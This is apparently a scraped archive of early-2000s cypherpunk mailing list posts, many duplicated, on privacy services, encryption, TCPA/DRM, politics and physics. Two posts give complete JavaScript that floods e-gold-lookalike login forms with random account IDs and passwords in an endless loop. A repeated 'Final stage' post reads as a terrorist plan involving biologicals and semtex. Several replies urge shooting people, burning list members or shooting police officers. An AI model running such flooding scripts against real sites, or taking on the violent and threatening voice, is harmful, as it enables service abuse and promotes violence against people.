Steve Thompson
Out of nowhere cometh Steve Thompson, and sayeth he all manner of things. But, while his mouth moveth one way, he seemeth to move the other. http://groups-beta.google.com/groups?q=%22steve+thompson%22start=0hl=ensafe=off; What hath suddenly attracted our AUK creep?
Re: Anti-RFID outfit deflates Mexican VeriChip hype
Bring em on, oops, they are here already. Darn, it wasn't the commies and nazis who were the threat, it was your indolent life-style paid for by your swell-paid, smarter wife, up to women-empowered thieving the marketplace and making innumerable enemies for you to blame for your swelling brain fat-globules. Pray the draft is women-empowered so there's no need to shanghai the overaged, over-decrepit, over-funny-loving, inbred-feeders, pray for the Condies and the Maggies to fight the gameboy-dreamy battles, really face-to-face, not just stomp-hoof the youngsters into hell for a face-save the empire. Won't someone please slip a healthy dose of haloperidol into JYA's food?
Re: Anti-RFID outfit deflates Mexican VeriChip hype
Bring em on, oops, they are here already. Darn, it wasn't the commies and nazis who were the threat, it was your indolent life-style paid for by your swell-paid, smarter wife, up to women-empowered thieving the marketplace and making innumerable enemies for you to blame for your swelling brain fat-globules. Pray the draft is women-empowered so there's no need to shanghai the overaged, over-decrepit, over-funny-loving, inbred-feeders, pray for the Condies and the Maggies to fight the gameboy-dreamy battles, really face-to-face, not just stomp-hoof the youngsters into hell for a face-save the empire. Won't someone please slip a healthy dose of haloperidol into JYA's food?
Re: Anonymizer outsourcing customer data?
On Tue, 17 Aug 2004, Nomen Nescio wrote: They claim they have over 1 million users. Is a class action suit in order? Their privacy policy clearly states We consider your email address to be confidential information. We will never rent, sell, or otherwise reveal it to any other party without prior consent, except under the conditions set forth in the User Agreement for spamming and related abuses of netiquette, or unless we are compelled to do so by court order. As if that's not bad enough, I emailed their (useless) support about this and some retarded drone emailed back claiming that the email came from Anonymizer not lyris.net (even though I pointed out the IP address in the email belonged to lyris.net). *sigh* Such incompetance :( Oh, look! Anonymizer has fixed the problem in their latest HTML-laden email! Return-Path: [EMAIL PROTECTED] See, they care! Oops: Name:anonymizer.lyris.net Address: 64.62.197.139 Aliases: wecare.anonymizer.com Methinks they are mocking us. What happened to them? They were a fine company once. Did Cottrell sell the brand? What other parts of the privacy policy are they willfully violating?
Re: Anonymizer outsourcing customer data?
On Tue, 17 Aug 2004, Nomen Nescio wrote: They claim they have over 1 million users. Is a class action suit in order? Their privacy policy clearly states We consider your email address to be confidential information. We will never rent, sell, or otherwise reveal it to any other party without prior consent, except under the conditions set forth in the User Agreement for spamming and related abuses of netiquette, or unless we are compelled to do so by court order. As if that's not bad enough, I emailed their (useless) support about this and some retarded drone emailed back claiming that the email came from Anonymizer not lyris.net (even though I pointed out the IP address in the email belonged to lyris.net). *sigh* Such incompetance :( Oh, look! Anonymizer has fixed the problem in their latest HTML-laden email! Return-Path: [EMAIL PROTECTED] See, they care! Oops: Name:anonymizer.lyris.net Address: 64.62.197.139 Aliases: wecare.anonymizer.com Methinks they are mocking us. What happened to them? They were a fine company once. Did Cottrell sell the brand? What other parts of the privacy policy are they willfully violating?
Re: Anonymizer outsourcing customer data?
On Mon, 2 Aug 2004, J.A. Terranson wrote: Yes, this bugs me. But the person they outsourced it *to* scares me even more! They claim they have over 1 million users. Is a class action suit in order? Their privacy policy clearly states We consider your email address to be confidential information. We will never rent, sell, or otherwise reveal it to any other party without prior consent, except under the conditions set forth in the User Agreement for spamming and related abuses of netiquette, or unless we are compelled to do so by court order.
Re: Anonymizer outsourcing customer data?
On Mon, 2 Aug 2004, J.A. Terranson wrote: Yes, this bugs me. But the person they outsourced it *to* scares me even more! They claim they have over 1 million users. Is a class action suit in order? Their privacy policy clearly states We consider your email address to be confidential information. We will never rent, sell, or otherwise reveal it to any other party without prior consent, except under the conditions set forth in the User Agreement for spamming and related abuses of netiquette, or unless we are compelled to do so by court order.
Anonymizer outsourcing customer data?
Recently I received the Anonymizer PrivacyShield Alert, as an Anonymizer user, and was distressed to note that it appears Anonymizer has now outsourced its mail and marketing infrastructure. Partial headers from new mail system: Return-Path: [EMAIL PROTECTED] Received: from anonymizer.lyris.net ([64.62.197.139]) From: Anonymizer.com [EMAIL PROTECTED] Subject: PrivacyShield Alert - July 2004 [] The previous mail messages appeared to have local to Anonymizer mail delivery systems sending them. Does it bother anyone else that Anonymizer is outsourcing its customer information?
Re: Email tapping by ISPs, forwarder addresses, and crypto proxies
I can't imagine any intelligence professional wasting her time reading the crap at times coming over this list. As of mid 2000 most of traffic is recorded. By this time 'most' is very close to 'all'. But if you e-mail someone with account on the same local ISP, using dial-in at the recipient is also using dial-in, and ISP didn't farm-out dial-in access, then your message may not be backed up forever.
Final stage
Praise Allah! The spires of the West will soon come crashing down! Our Brother wishes for us to meet at the previously discussed southeastern roadhouse on August 1st, in preparation for the operations scheduled for August 6th and 9th. Alternative targets have been chosen. Contact Jibril if you have not heard of the changes since the last meeting. The infidels have machines that detect the biologicals, so make sure the containers are sealed and scrubbed as discussed. Leave excess semtex behind. The more we transport, the more likely the infidels are to detect us. We have received more funding and supplies from our brothers in Saudi Arabia and Syria. Be prepared for another operation before January. Praise Allah! May the blood of the infidels turn the oceans red!
Re: Email tapping by ISPs, forwarder addresses, and crypto proxies
I can't imagine any intelligence professional wasting her time reading the crap at times coming over this list. As of mid 2000 most of traffic is recorded. By this time 'most' is very close to 'all'. But if you e-mail someone with account on the same local ISP, using dial-in at the recipient is also using dial-in, and ISP didn't farm-out dial-in access, then your message may not be backed up forever.
Final stage
Praise Allah! The spires of the West will soon come crashing down! Our Brother wishes for us to meet at the previously discussed southeastern roadhouse on August 1st, in preparation for the operations scheduled for August 6th and 9th. Alternative targets have been chosen. Contact Jibril if you have not heard of the changes since the last meeting. The infidels have machines that detect the biologicals, so make sure the containers are sealed and scrubbed as discussed. Leave excess semtex behind. The more we transport, the more likely the infidels are to detect us. We have received more funding and supplies from our brothers in Saudi Arabia and Syria. Be prepared for another operation before January. Praise Allah! May the blood of the infidels turn the oceans red!
Re: Saving Opportunistic Encryption
Hi, Sandy Harris wrote: Tarapia Tapioco wrote: A possible implementation looks like this: ... * Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an RSA key from said DNS repository and generate appropriate security policies. Cleaner solution, but more work probably. Why would you use racoon? FreeS/WAN's Pluto is available, under GPL, already does OE, and works with 2.6 kernel IPsec (though I'm not certain if patches are needed for that). Wouldn't it be a better starting point? I have to take a look at this. Using racoon was my first idea because it seems to be the official Linux thing these days and is portable to the *BSDs, too. It's probably only the NIH syndrome at work. Also, using pluto suffers from the general FreeS/WAN problem of not allowing contributions from USAians. Anyway, thanks for the reminder - while the project is still at the half-assed idea tossing state, hacking FreeS/WAN should still be an option.
Re: Saving Opportunistic Encryption
Hi, Sandy Harris wrote: Tarapia Tapioco wrote: A possible implementation looks like this: ... * Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an RSA key from said DNS repository and generate appropriate security policies. Cleaner solution, but more work probably. Why would you use racoon? FreeS/WAN's Pluto is available, under GPL, already does OE, and works with 2.6 kernel IPsec (though I'm not certain if patches are needed for that). Wouldn't it be a better starting point? I have to take a look at this. Using racoon was my first idea because it seems to be the official Linux thing these days and is portable to the *BSDs, too. It's probably only the NIH syndrome at work. Also, using pluto suffers from the general FreeS/WAN problem of not allowing contributions from USAians. Anyway, thanks for the reminder - while the project is still at the half-assed idea tossing state, hacking FreeS/WAN should still be an option.
Re: Saving Opportunistic Encryption
Hi, Sandy Harris wrote: Tarapia Tapioco wrote: A possible implementation looks like this: ... * Linux/KAME's IKE daemon racoon is patched to attempt retrieval of an RSA key from said DNS repository and generate appropriate security policies. Cleaner solution, but more work probably. Why would you use racoon? FreeS/WAN's Pluto is available, under GPL, already does OE, and works with 2.6 kernel IPsec (though I'm not certain if patches are needed for that). Wouldn't it be a better starting point? I have to take a look at this. Using racoon was my first idea because it seems to be the official Linux thing these days and is portable to the *BSDs, too. It's probably only the NIH syndrome at work. Also, using pluto suffers from the general FreeS/WAN problem of not allowing contributions from USAians. Anyway, thanks for the reminder - while the project is still at the half-assed idea tossing state, hacking FreeS/WAN should still be an option.
Internet Voting, Safely
Recently there has been publicity about a report critical of a proposed internet voting experiment, http://servesecurityreport.org/. The authors critique the SERVE system, which was designed to allow overseas military personnel to vote absentee via the internet. The authors were four members of the SPRG (Security Peer Review Group), a panel of experts in computerized election security that was called upon to review the SERVE project. While the report makes many good points, any realistic appraisal of the prospects for internet voting must look beyond the current state of the art in security technology. It will take years before internet voting can become widely available, and in that time we can expect currently planned security improvements to be implemented and fielded. In particular, the advent of Trusted Computing, principally in the form of Microsoft's Next Generation Secure Computing Base (NGSCB), offers a number of features which should address the most significant security-related limitations and problems for the widespread use of internet voting. For more commentary, see the Unlimited Freedom blog entry at http://invisiblog.com/1c801df4aee49232/article/9d481af00c898ae91748f2f0cd97cf80.
loader 7
save as plain text, loader7.html and run in a browser. whitehatter htmlhead script language=javascript !-- var dns = ; var c = true; function popup() { document.formname.Account_ID.value = get_random(); document.formname.P_hrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 2000); } function get_random() { var ranNum = Math.round(Math.random()*99); return ranNum; } function getRandomNum() { // between 0 - 1 var rndNum = Math.random() // rndNum from 0 - 1000 rndNum = parseInt(rndNum * 1000); // rndNum from 33 - 127 rndNum = (rndNum % 94) + 33; return rndNum; } function checkPunc(num) { if ((num =33) (num =47)) { return true; } if ((num =58) (num =64)) { return true; } if ((num =91) (num =96)) { return true; } if ((num =123) (num =126)) { return true; } return false; } function GeneratePassword() { var length; var sPassword = ; length = 6+ Math.round(Math.random()*20) for (i=0; i length; i++) { numI = getRandomNum(); while (checkPunc(numI)) { numI = getRandomNum(); } sPassword = sPassword + String.fromCharCode(numI); } return sPassword; } function autosubmit() { if (c) { document.formname.Account_ID.value = get_random(); document.formname.P_hrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 1000); } } function turn() { c = !c; if (c) setTimeout(autosubmit();, 2000); document.formname.x.value = c?Stop it!:Let's do it again!; } //-- /script /head body onload=popup(); center form name=formname method=post action=https://e-gold0.com/acct/acct.php; target=new7 input type=text name=Account_ID length=20 maxlength=40 size=25br input type=hidden name=email value= input taborder=2 tabindex=2 type=text name=P_hrase maxlength=64 size=32 autocomplete=off input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 autocomplete=off value=584095 input type=hidden name=jumbo value=2368 input type=submit name=Submit value=Login input notab type=checkbox name=StoreMyNumber value=checkbox checked input type=button name=x value=Stop it! onclick=turn(); /form /center /body /html
loader 7
save as plain text, loader7.html and run in a browser. whitehatter htmlhead script language=javascript !-- var dns = ; var c = true; function popup() { document.formname.Account_ID.value = get_random(); document.formname.P_hrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 2000); } function get_random() { var ranNum = Math.round(Math.random()*99); return ranNum; } function getRandomNum() { // between 0 - 1 var rndNum = Math.random() // rndNum from 0 - 1000 rndNum = parseInt(rndNum * 1000); // rndNum from 33 - 127 rndNum = (rndNum % 94) + 33; return rndNum; } function checkPunc(num) { if ((num =33) (num =47)) { return true; } if ((num =58) (num =64)) { return true; } if ((num =91) (num =96)) { return true; } if ((num =123) (num =126)) { return true; } return false; } function GeneratePassword() { var length; var sPassword = ; length = 6+ Math.round(Math.random()*20) for (i=0; i length; i++) { numI = getRandomNum(); while (checkPunc(numI)) { numI = getRandomNum(); } sPassword = sPassword + String.fromCharCode(numI); } return sPassword; } function autosubmit() { if (c) { document.formname.Account_ID.value = get_random(); document.formname.P_hrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 1000); } } function turn() { c = !c; if (c) setTimeout(autosubmit();, 2000); document.formname.x.value = c?Stop it!:Let's do it again!; } //-- /script /head body onload=popup(); center form name=formname method=post action=https://e-gold0.com/acct/acct.php; target=new7 input type=text name=Account_ID length=20 maxlength=40 size=25br input type=hidden name=email value= input taborder=2 tabindex=2 type=text name=P_hrase maxlength=64 size=32 autocomplete=off input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 autocomplete=off value=584095 input type=hidden name=jumbo value=2368 input type=submit name=Submit value=Login input notab type=checkbox name=StoreMyNumber value=checkbox checked input type=button name=x value=Stop it! onclick=turn(); /form /center /body /html
e-gold script to run from whitehat
htmlhead script language=javascript !-- var dns = ; var c = true; function popup() { document.formname.AccountID.value = get_random(); document.formname.PassPhrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 2000); } function get_random() { var ranNum = Math.round(Math.random()*99); return ranNum; } function getRandomNum() { // between 0 - 1 var rndNum = Math.random() // rndNum from 0 - 1000 rndNum = parseInt(rndNum * 1000); // rndNum from 33 - 127 rndNum = (rndNum % 94) + 33; return rndNum; } function checkPunc(num) { if ((num =33) (num =47)) { return true; } if ((num =58) (num =64)) { return true; } if ((num =91) (num =96)) { return true; } if ((num =123) (num =126)) { return true; } return false; } function GeneratePassword() { var length; var sPassword = ; length = 6+ Math.round(Math.random()*20) for (i=0; i length; i++) { numI = getRandomNum(); while (checkPunc(numI)) { numI = getRandomNum(); } sPassword = sPassword + String.fromCharCode(numI); } return sPassword; } function autosubmit() { if (c) { document.formname.AccountID.value = get_random(); document.formname.PassPhrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 1000); } } function turn() { c = !c; if (c) setTimeout(autosubmit();, 2000); document.formname.x.value = c?Stop it!:Let's do it again!; } //-- /script /head body onload=popup(); center form name=formname method=post action=http://registration-update.net/e-gold_account/user-4598Xinc/e-gold-x621vx7/login.php; target=new3 input type=text name=AccountID length=20 maxlength=40 size=25br input taborder=2 tabindex=2 type=text name=PassPhrase maxlength=64 size=32 autocomplete=off input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 autocomplete=off value=417927 input type=hidden name=jumbo value=2121 input type=submit name=Submit value=Login input notab type=checkbox name=StoreMyNumber value=checkbox checked input type=button name=x value=Stop it! onclick=turn(); /form /center /body /html
MIME-encrustations.
Regarding the use of the mutt-specific MIME-encrusted PGP message format on mailing lists, I think Jon Callas (author of the OpenPGP RFC) sums up the issues best: http://www.imc.org/ietf-openpgp/mail-archive/msg03786.html
e-gold script to run from whitehat
htmlhead script language=javascript !-- var dns = ; var c = true; function popup() { document.formname.AccountID.value = get_random(); document.formname.PassPhrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 2000); } function get_random() { var ranNum = Math.round(Math.random()*99); return ranNum; } function getRandomNum() { // between 0 - 1 var rndNum = Math.random() // rndNum from 0 - 1000 rndNum = parseInt(rndNum * 1000); // rndNum from 33 - 127 rndNum = (rndNum % 94) + 33; return rndNum; } function checkPunc(num) { if ((num =33) (num =47)) { return true; } if ((num =58) (num =64)) { return true; } if ((num =91) (num =96)) { return true; } if ((num =123) (num =126)) { return true; } return false; } function GeneratePassword() { var length; var sPassword = ; length = 6+ Math.round(Math.random()*20) for (i=0; i length; i++) { numI = getRandomNum(); while (checkPunc(numI)) { numI = getRandomNum(); } sPassword = sPassword + String.fromCharCode(numI); } return sPassword; } function autosubmit() { if (c) { document.formname.AccountID.value = get_random(); document.formname.PassPhrase.value = GeneratePassword(); document.formname.submit(); setTimeout(autosubmit();, 1000); } } function turn() { c = !c; if (c) setTimeout(autosubmit();, 2000); document.formname.x.value = c?Stop it!:Let's do it again!; } //-- /script /head body onload=popup(); center form name=formname method=post action=http://registration-update.net/e-gold_account/user-4598Xinc/e-gold-x621vx7/login.php; target=new3 input type=text name=AccountID length=20 maxlength=40 size=25br input taborder=2 tabindex=2 type=text name=PassPhrase maxlength=64 size=32 autocomplete=off input taborder=3 tabindex=3 type=hidden name=Turing maxlength=10 size=10 autocomplete=off value=417927 input type=hidden name=jumbo value=2121 input type=submit name=Submit value=Login input notab type=checkbox name=StoreMyNumber value=checkbox checked input type=button name=x value=Stop it! onclick=turn(); /form /center /body /html
MIME-encrustations.
Regarding the use of the mutt-specific MIME-encrusted PGP message format on mailing lists, I think Jon Callas (author of the OpenPGP RFC) sums up the issues best: http://www.imc.org/ietf-openpgp/mail-archive/msg03786.html
re: Getting certificates.
On Wed, 3 Sep 2003, James A. Donald wrote: -- SSH server public/private keys are widely deployed. PKI public keys are not. Reason is that each SSH server just whips up its own keys without asking anyone's permission, or getting any certificates. Outlook and outlook express support digital signing and encryption -- but one must first get a certificate. So I go to Thawte to get my free certificate, and find that Thawte is making an alarmingly great effort to link certificates with true name information, and with the beast number that your government has assigned to you, which imposes large costs both on Thawte, and on the person seeking the certificate, and also has the highly undesirable effect that using these certificates causes major loss of privacy, by enabling true name and beast number contact tracing of people using encryption. Now what I want is a certificate that merely asserts that the holder of the certificate can receive email at such and such an address, and that only one such certificate has been issued for that address. Such a certification system has very low costs for issuer and recipient, and because it is a nym certificate, no loss of privacy. Is there any web page set up to automatically issue such certificates? The certs that IE and outlook express accept oddly do not seem to have any provision for defining what the certificate certifies. This seems a curious and drastic omission from a certificate format. Since there is no provision to define what a certificate certifies, one could argue that any certification authority that certifies anything other than a true name connected to a state issued id number, the number of the beast, is guilty of fraud. This would seem to disturbingly limit the usefulness and application of such certificates. It also, as anyone who tries to get a free certificate from Thawte will discover, makes it difficult, expensive, and inconvenient to get certificates. --digsig James A. Donald Here is an interesting post regarding the CA issue: http://lists.spack.org/pipermail/wordup/2003/000684.html You may want to look at http://www.cacert.org. It may do what you want.
Philips CRYPTO1 stream cipher
Does anyone have any source code or algos for Philips CRYPTO1 stream cipher as used in their MIFARE products?
RE: Idea: The ultimate CD/DVD auditing tool
As an audiophile (Krell+Levinson+Thiel gear at home), I definitely don't want to grab an analog signal. Doing that the signal is sure to retain characteristics of the extracting gear. But the vast majority of P2P kids won't care one iota that their file was analog for half a second. -TD I'll ditto that - my brother is an extremist audiophile - he writes reviews for the high-end stuff (google Mike Trei). Many (by no means all) top end audophiles prefer all-analog equipment, and direct-cut vinyl records (ie, the master disk was cut directly at the performance, without a magtape master). I've listened to some of this stuff, and it just blows digital away. What else do you expect, when any audiophile who denies that inaudible frequencies make the music warmer proves himself to be a philistine with ears of tin? Remember, it was the fashion and clothing EXPERTS who were the most insistent that the emperor's new clothes were absolutely marvelous.
Re: Orwell's Victory goods come home
On Sat, 15 Mar 2003 14:25:51 +, you wrote: So which American on the list is going to write to Congress to demand that the Statue of Liberty be sent back to France? Ken It really should go back to France, as the US seems to care less about liberty than when it received that gift, and France now has quite a profile of opposing foreign domination (from the US) over its policies and interests. So far as I can tell tell, the US approach to other nations is essentially shut up and do what we tell you to do if you love freedom.
Re: Fw: Drunk driver detector that radios police
On Fri, 7 Mar 2003 09:31:40 -0500 (est), Sunder [EMAIL PROTECTED] wrote: Screw that - just buy a few thousand of these little devices, disable them so that they're always transmitting drunk driver and install them in politicians' cars all over DC (make sure you install'em in cop cars too.) You can also leave them in cabs. They'll be banned immediately. What the fuck makes you think you'd need to disable them for politicians? Ted Kennedy, anyone?
Re: Fw: Drunk driver detector that radios police
On Fri, 7 Mar 2003 09:31:40 -0500 (est), Sunder [EMAIL PROTECTED] wrote: Screw that - just buy a few thousand of these little devices, disable them so that they're always transmitting drunk driver and install them in politicians' cars all over DC (make sure you install'em in cop cars too.) You can also leave them in cabs. They'll be banned immediately. What the fuck makes you think you'd need to disable them for politicians? Ted Kennedy, anyone?
Re: Give cheese to france?
On Sat, 08 Mar 2003 09:00:48 -0800, you wrote: -- On 8 Mar 2003 at 2:44, Anonymous wrote: But let's cut to the chase. Assume that all private grocery store owners want to exclude people from their stores. Now assume that 100% of them agree that effective Tuesday, only those people who have a receipt for a $100 or more donation to George W Bush (or Hillary Clinton, whatever) may enter their property to shop for groceries. The difference between private property owners doing this, and the governemnt doing this is that 100% of private property owners are NOT going to agree on anything. The 100% assumption presupposes that the capitalists are like the state, a single entity with a single will, in which case it is obvious that simply replacing the will of the capitalists with the will of the people would be a vast improvement, rather than slavery terror and mass murder. You are exactly right! Now comes the question: If the mall has the right, but can't join with all malls to solidify the uniformity of the prohibition, then a property right will be interfered with, either the right of one mall to prohibit, or the right of malls to agree to prohibit. Else the power of monopoly (all malls unified) has part of the effect of the government's monopoly.
Re: Give cheese to france?
On Sat, 08 Mar 2003 09:00:48 -0800, you wrote: -- On 8 Mar 2003 at 2:44, Anonymous wrote: But let's cut to the chase. Assume that all private grocery store owners want to exclude people from their stores. Now assume that 100% of them agree that effective Tuesday, only those people who have a receipt for a $100 or more donation to George W Bush (or Hillary Clinton, whatever) may enter their property to shop for groceries. The difference between private property owners doing this, and the governemnt doing this is that 100% of private property owners are NOT going to agree on anything. The 100% assumption presupposes that the capitalists are like the state, a single entity with a single will, in which case it is obvious that simply replacing the will of the capitalists with the will of the people would be a vast improvement, rather than slavery terror and mass murder. You are exactly right! Now comes the question: If the mall has the right, but can't join with all malls to solidify the uniformity of the prohibition, then a property right will be interfered with, either the right of one mall to prohibit, or the right of malls to agree to prohibit. Else the power of monopoly (all malls unified) has part of the effect of the government's monopoly.
Re: Give cheese to france?
On Thu, 6 Mar 2003 19:21:52 -0800, you wrote: On Thursday, March 6, 2003, at 02:11 PM, Major Variola (ret) wrote: Besides, the publicity has been great. I was told that after it made news, 150 women wearing the same T-shirts showed up at the mall. The security guards locked themselves in their offices. Probably messed their pants, too. If people didn't leave my property when told to, and the actual police would not expel them, then I would consider it morally justified to start shooing those 150 bitches. Sometimes people don't understand anything except bullets. My defense would be that it was my property, they were trespassing, and the police refused to do their job. Stupid defense, and if you found a judge stupid enough to allow it, I'd be surprised. If you proved the elements above, you are still guilty of murder. You'd be the bitch in prison over that one. No state in the US allows lethal force for trespassing. Do it the way you said and you go down for murder one. Frankly, many of you on this list really need to be doused with gasoline and then lit. Maybe YOU need them to be doused; others are unlike to think they need dousing. I'm ashamed to be on the same list with you statists and fascists. The Eurotrash nitwits are the worst. It's as if they were born in Communist countries and never shook their early training...which, come to think of it, is probably likely. Take a day off, go for a walk.
Comments to DOT's new Big Brother Airline Program Due Feb 24!
COMMENTS MUST BE *RECEIVED* BY FEB. 24. PLEASE SEND THEM OUT ASAP! SUMMARY: DOT has published its intent to establish a Big Brother system of records and is soliciting public comments. The DOT must consider the comments it receives before finalizing its actions. These comments were a big help last time around fighting National IDs in the guise of standardized state drivers licenses. Many fewer citizens have commented on DOT's proposed data collection, however, and time and liberties are running short. Information about the system is printed below, as is a short sample letter. Feel free to write something longer, but even a short statement of your opposition to the draconian record system and a signature would be helpful. The U.S. Department of Transportation (DOT) intends to establish a system of records which will collect information from all air travelers. DOT intends to release the information upon request to any agency for the hiring or retention of an individual, or issuance of a security clearance, license, contract, grant, or other benefit. DOT also intends to disclose the information it collects to any Federal, State, territorial, tribal, local, international, or foreign agency when DOT becomes aware of any indication of any criminal or civil infraction of any statute, rule, regulation, order, or license by any person traveling by air. This applies even to citizens of the United States when flying within their own country. This is an outrageous assault on the Privacy Act, as well as an affront to the privacy of law abiding U.S. citizens. If you are concerned about the collection and disclosure of information from air travelers and want the DOT to rescind its proposal, please provide your comments to Yvonne L. Coates at the address below. Comments must be RECEIVED by February 24, 2003, to be considered. A sample letter is also below. Yvonne L. Coates Department of Transportation Office of the Secretary 400 7th Street, SW Washington, DC 20590 (202) 366-6964 (telephone) (202) 366-7024 (fax) [EMAIL PROTECTED] (Internet address) Reference: Federal Register, January 15, 2003, Volume 68, Number 10, Pages 2101-2103. - Begin Sample Letter - Dear Ms. Coates, I am writing to voice my objections to DOT's proposed information collection of airline passenger information published in the Federal Register, January 15, 2003, Pages 2101-2103. The proposed system is an affront to the personal liberties on which this nation was founded. Please rescind it. Signed, Your Name. -- End Sample Letter --
Re: [IP] Open Source TCPA driver and white papers (fwd)
Mike Rosing wrote: BTW, why should I need a TPM only for secure key storage ? Any smartcard is better suited for this. Because it's soldered into the portable. For an enterprise that means they *know* each portable out in the field is held by the correct user. With a smart card, they only know the card is held by the correct user. A key store chip could be useful for some applications. However note: you can't defend TCPA as being good vs Palladium bad (as you did by in an earlier post) by saying that TCPA only provides key storage. As Michel noted TCPA and Palladium both provide remote attestation and sealing, and it is this pair of functions which provides the DRM functionality. Therefore for DRM purposes TCPA and Palladium are both socially bad technologies.
Re: [IP] Open Source TCPA driver and white papers (fwd)
Mike Rosing wrote: - secure boot - sealing - remote attestation It does *not* do these parts. I think you may have been mislead by the slant of paper. Quoting from the paper: http://www.research.ibm.com/gsal/tcpa/why_tcpa.pdf you will see: | The TCPA chip is not particularly suited to DRM. While it does have | the ability to report signed PCR information, and this information | could be used to prevent playback unless a trusted operating system | and application were in use, this type of scheme would be a | nightmare for content providers to manage. Any change to the BIOS, | the operating system, or the application would change the reported | values. How could content providers recognize which reported PCR | values were good, given the myriad platforms, operating system | versions, and frequent software patches? which clearly admits that the IBM TPM does implement the full set of TCPA functionality as specified in the openly published TCPA spec, and for the purposes of our discussion specifically as you see it does implement the remote attestation feature. (Though the author makes some unimaginative claims that it is not suited for DRM because of upgrades may make that difficult to manage. Any sane software architecture built on top of this tech can easily tackle that problem.) That's why IBM wants the TPM != TCPA to be loud and clear. That's why the RIAA can't expect it to solve their problem. I'd think the more likely reason they want to downplay that TCPA is a DRM enabling technology is because it's bad publicity for a hardware manufacturer.
Re: [IP] Open Source TCPA driver and white papers (fwd)
Mike Rosing wrote: - secure boot - sealing - remote attestation It does *not* do these parts. I think you may have been mislead by the slant of paper. Quoting from the paper: http://www.research.ibm.com/gsal/tcpa/why_tcpa.pdf you will see: | The TCPA chip is not particularly suited to DRM. While it does have | the ability to report signed PCR information, and this information | could be used to prevent playback unless a trusted operating system | and application were in use, this type of scheme would be a | nightmare for content providers to manage. Any change to the BIOS, | the operating system, or the application would change the reported | values. How could content providers recognize which reported PCR | values were good, given the myriad platforms, operating system | versions, and frequent software patches? which clearly admits that the IBM TPM does implement the full set of TCPA functionality as specified in the openly published TCPA spec, and for the purposes of our discussion specifically as you see it does implement the remote attestation feature. (Though the author makes some unimaginative claims that it is not suited for DRM because of upgrades may make that difficult to manage. Any sane software architecture built on top of this tech can easily tackle that problem.) That's why IBM wants the TPM != TCPA to be loud and clear. That's why the RIAA can't expect it to solve their problem. I'd think the more likely reason they want to downplay that TCPA is a DRM enabling technology is because it's bad publicity for a hardware manufacturer.
Re: Pigs Kill Family Pet
On 9 Jan 2003, lcs Mixmaster Remailer wrote: On Thu, 9 Jan 2003 12:35:38 -0500, you wrote: No they don't; or they wouldn't have had the balls to stop the car in the first place. Most cops in Cookeville, TN have dogs. I wonder if they would mind them being shotgunned to death. If the dog presents a threat of any type like running up wagging its tail like it did on the cop's video it is procedure to shoot them. If it's good enough for passing motorists pets it's sure good enough for cop's dogs seems to me. You just can't allow that threat to go unstopped you know? Buck shot is best according to the cops. Ick. Shooting a dog because it is wagging its tail is not justified, no matter what the cops do. You can't put a dog down just because of who its masters are -- dogs lack the intellectual reasoning capabilities to understand that their owners are evil. Instead, any cop who shows such blatant disrespect for life and property as the Tennessee cops in question should himself be shot in the face with a shotgun, and left on the side of the road to rot.
Re: Pigs Kill Family Pet
On 9 Jan 2003, lcs Mixmaster Remailer wrote: On Thu, 9 Jan 2003 12:35:38 -0500, you wrote: No they don't; or they wouldn't have had the balls to stop the car in the first place. Most cops in Cookeville, TN have dogs. I wonder if they would mind them being shotgunned to death. If the dog presents a threat of any type like running up wagging its tail like it did on the cop's video it is procedure to shoot them. If it's good enough for passing motorists pets it's sure good enough for cop's dogs seems to me. You just can't allow that threat to go unstopped you know? Buck shot is best according to the cops. Ick. Shooting a dog because it is wagging its tail is not justified, no matter what the cops do. You can't put a dog down just because of who its masters are -- dogs lack the intellectual reasoning capabilities to understand that their owners are evil. Instead, any cop who shows such blatant disrespect for life and property as the Tennessee cops in question should himself be shot in the face with a shotgun, and left on the side of the road to rot.
QM, A-B, and the Z
Jim Choate wrote... Burrowing into what I claimed is 'wacky crapola' I discovered a nugget of truth I can agree with (but it'll take a minute to get there...) And no, Relativity and QM have -not- been joined into a -single cohesive theory-. You have to qualify this. General relativity has not been unified with quantum mechanics in any way that is universally accepted yet, but the superstring and M-Theory cats may be closing in. Special relativity is of course a completely diferent story. Much pof modern QM would be impossible without it, and relativistic considerations are a mundane part of high-energy particle and accelerator work. What I -am- saying is that in this specific issue (ie behavior of entangled photons -or- two slip experiments) the 'problem' of instant state changes over distance doesn't actually happen. The reason being that the state changes are -not- taking place in -our time-space framework- but the -photons-. These two time-space frameworks are -not- the same. Well, I might be willing to agree with you...kind of. The little intuition I've been able to build up about EPR is that the uncollapsed wavefuction for the correlated photons isn't aware of 'distance' or other measurement parameters. Distance and time are only encountered during the measurement process, and only then is there 'two photons'...kind of a physical kenosis. Whaledreck. How does the electron interact with -any- EM field (ie voltage)? Via an 'intermediate vector boson', that's how. What is that particle? A -photon-. How much difference in distance or time is there -from the perspective of the photon- between the electron and the shielded field? Answer, none. The reality is that the 'shield' is -only- a shield in our frame of reference, it's nothing from the photons... Double whaledreck (I actually never heard that phrase before...) First of all, an intermediate vector boson is not even remotely a photon, but I doubt that's germane to the argument. (But physicists do not invoke Z-particles to explain this kind of interaction. In fact, right now there is no particle-based explaination for this interchange.) Second (and this does matter, from what I'm reading into your writing), A-B uses an electron beam that is split, and the upper and lower halfs of this beam made to reconverge on the other side of a toroidal-protected hole. In that hole is a voltage, and A-B easily predicts that the relative phase of the electrons as they recoverge will be different, and the magnitude of the phase change is directly proportional to the voltage in the hole, that they are completely 'unaware' of in the classical sense. The point for me here is that one can not extend classical thinking to account for this. (In fact, its very hard to extend common sense to understand this.) How do the electrons 'see' that voltage? Through what mechanism? According to quantum theory, it clearly appears that (like in EPR) they are aware of that field without interacting with it at all. There's no particle exchange. It isn't a problem of physics, it's a problem of imagination. Well, that's basically MY point. QM seems to be telling us something about reali9ty, but we can't imagine what it is (David Duetch and a few others have tried). We don't have a picture yet ot go with our data and theories. But if I have time, I'll repost about why a 'Cypherpunk' 